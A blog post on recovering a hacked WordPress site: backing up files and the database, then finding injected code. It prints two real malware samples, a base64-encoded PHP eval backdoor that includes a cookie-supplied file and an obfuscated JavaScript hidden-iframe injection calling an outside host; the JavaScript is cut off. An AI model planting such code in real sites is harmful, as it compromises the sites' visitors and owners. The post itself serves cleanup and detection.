What to do when your blog has a virus

The last time my blog was hacked was… let me remember… uh… yesterday.

But hackers know my blog since quite a long ago and they even made my blog be marked by Google as a site that may harm your computer.

Never mind, all these attacks gave me some experience about the typical WordPress hack.

So, when you realize your blog has been hacked, follow these steps:

Backup your ftp content

Simply open your favorite FTP client and download all the content of your site

Backup your MySQL database

Every decent hosting plan now supports PhpMyAdmin. With this tool you can export and save your entire database in a matter of seconds (or minutes, according to the size of your DB).

Look at this picture:

with your WP database selected, click on Export (1)

Then this is the next page:

remember to:

1) Have all tables selected

2) Select SQL as database type

3) Check Structure, Add IF NOT EXISTS and Enclose table and field names with backquotes. Leave unchecked Add AUTO_INCREMENT value because WP tables already have an auto increment column

4) Check Data, Complete inserts, Extended inserts and Use hexadecimal for BLOB

5) Check Save as file and None. Choosing zipped can be too CPU intensive for your hosting plan

Hunt for the virus

I experienced two types of viruses, both with inserted code into my WP files.

The first one is Php code inserted in one page, like this one

eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbInNoIl0pKXtpbmNsdWRlKCRfQ09PS0lFWyJzaCJdKTtleGl0O30='));

that once evaluated is

if(isset($_COOKIE["sh"])){include($_COOKIE["sh"]);exit;}

The second one is a javascript code inserted in one page, like this one

var OymMAWPnBMGWAGuoPiVY = "q60q105q102q114q97q109q101q32q119q105q100q116q104q61q34q52q56q48q34q32q104q101q105q103q104q116q61q34q54q48q34q32q115q114q99q61q34q104q116q116q112q58q47q47q105q108q111q118q101q104q97q115q104q46q99q110q47q114q97q115q116q97q116q100q115q47q103q111q46q112q104q112q63q115q105q100q61q53q34q32q115q116q121q108q101q61q34q98q111q114q100q101q114q58q48q112q120q59q32q112q111q115q105q116q105q111q110q58q114q101q108q97q116q105q118q101q59q32q116q111q112q58q48q112q120q59q32q108q101q102q116q58q45q53q48q48q112q120q59q32q111q112q97q99q105q116q121q58q48q59q32q102q105q108q116q101q114q58q112q114q111q103q105q100q58q68q88q73q109q97q103q101q84q114q97q110q115q102q111q114q109q46q77q105q99q114q111q115q111q102q116q46q65q108q112q104q97q40q111q112q97q99q105q116q121q61q48q41q59q32q45q109q111q122q45q111q112q97q99q105q116q121q58q48q34q62q60q47q105q102q114q97q109q101q62";var LtBVGDCUsUSHTFUTcjHd = OymMAWPnBMGWAGuoPiVY.split("q");var wOAwUuljcGInzJIGNLaG = "";for (var gtNzyhTaRbENpEKKzvub=1; gtNzyhTaRbENpEKKzvub

that once evaluated returns

I got some more similar codes injected in my pages, but all of them have been inserted at the end of the page, in the last row.

So you should search for eval or document.write and see if there are strange strings like the ones I got.

Then, delete or comment them and you should have your blog cleaned and virus-free

I am thinking about making a plugin doing all this hard work for you, at the moment the only one existing seems to be WordPress Exploit Scanner but I would like something more complete.

Get the most popular Phaser 3 book

Through 202 pages, 32 source code examples and an Android Studio project you will learn how to build cross platform HTML5 games and create a complete game along the way.

Get the book

215 GAME PROTOTYPES EXPLAINED WITH SOURCE CODE
// 1+2=3
// 100 rounds
// 10000000
// 2 Cars
// 2048
// A Blocky Christmas
// A Jumping Block
// A Life of Logic
// Angry Birds
// Angry Birds Space
// Artillery
// Astro-PANIC!
// Avoider
// Back to Square One
// Ball Game
// Ball vs Ball
// Ball: Revamped
// Balloon Invasion
// BallPusher
// Ballz
// Bar Balance
// Bejeweled
// Biggification
// Block it
// Blockage
// Bloons
// Boids
// Bombuzal
// Boom Dots
// Bouncing Ball
// Bouncing Ball 2
// Bouncy Light
// BoxHead
// Breakout
// Bricks
// Bubble Chaos
// Bubbles 2
// Card Game
// Castle Ramble
// Chronotron
// Circle Chain
// Circle Path
// Circle Race
// Circular endless runner
// Cirplosion
// CLOCKS - The Game
// Color Hit
// Color Jump
// ColorFill
// Columns
// Concentration
// Crossy Road
// Crush the Castle
// Cube Jump
// CubesOut
// Dash N Blast
// Dashy Panda
// Deflection
// Diamond Digger Saga
// Don't touch the spikes
// Dots
// Down The Mountain
// Drag and Match
// Draw Game
// Drop Wizard
// DROP'd
// Dudeski
// Dungeon Raid
// Educational Game
// Elasticity
// Endless Runner
// Erase Box
// Eskiv
// Farm Heroes Saga
// Filler
// Flappy Bird
// Fling
// Flipping Legend
// Floaty Light
// Fuse Ballz
// GearTaker
// Gem Sweeper
// Globe
// Goat Rider
// Gold Miner
// Grindstone
// GuessNext
// Helicopter
// Hero Emblems
// Hero Slide
// Hexagonal Tiles
// HookPod
// Hop Hop Hop Underwater
// Horizontal Endless Runner
// Hundreds
// Hungry Hero
// Hurry it's Christmas
// InkTd
// Iromeku
// Jet Set Willy
// Jigsaw Game
// Knife Hit
// Knightfall
// Legends of Runeterra
// Lep's World
// Line Rider
// Lumines
// Magick
// MagOrMin
// Mass Attack
// Math Game
// Maze
// Meeblings
// Memdot
// Metro Siberia Underground
// Mike Dangers
// Mikey Hooks
// Nano War
// Nodes
// o:anquan
// One Button Game
// One Tap RPG
// Ononmin
// Pacco
// Perfect Square!
// Perfectionism
// Phyballs
// Pixel Purge
// PixelField
// Planet Revenge
// Plants Vs Zombies
// Platform
// Platform game
// Plus+Plus
// Pocket Snap
// Poker
// Pool
// Pop the Lock
// Pop to Save
// Poux
// Pudi
// Pumpkin Story
// Puppet Bird
// Pyramids of Ra
// qomp
// Quick Switch
// Racing
// Radical
// Rebuild Chile
// Renju
// Rise Above
// Risky Road
// Roguelike
// Roly Poly
// Run Around
// Rush Hour
// SameGame
// SamePhysics
// Save the Totem
// Security
// Serious Scramblers
// Shrink it
// Sling
// Slingy
// Snowflakes
// Sokoban
// Space Checkers
// Space is Key
// Spellfall
// Spinny Gun
// Splitter
// Spring Ninja
// Sproing
// Stabilize!
// Stack
// Stairs
// Stick Hero
// String Avoider
// Stringy
// Sudoku
// Super Mario Bros
// Surfingers
// Survival Horror
// Talesworth Adventure
// Tetris
// The Impossible Line
// The Moops - Combos of Joy
// The Next Arrow
// Threes
// Tic Tac Toe
// Timberman
// Tiny Wings
// Tipsy Tower
// Toony
// Totem Destroyer
// Tower Defense
// Trick Shot
// Tunnelball
// Turn
// Turnellio
// TwinSpin
// vvvvvv
// Warp Shift
// Way of an Idea
// Whack a Creep
// Wheel of Fortune
// Where's my Water
// Wish Upon a Star
// Word Game
// Wordle
// Worms
// Yanga
// Yeah Bunny
// Zhed
// zNumbers